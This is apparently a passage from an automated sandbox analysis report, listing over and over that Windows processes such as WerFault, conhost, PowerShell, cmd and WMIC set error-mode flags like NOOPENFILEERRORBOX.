        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
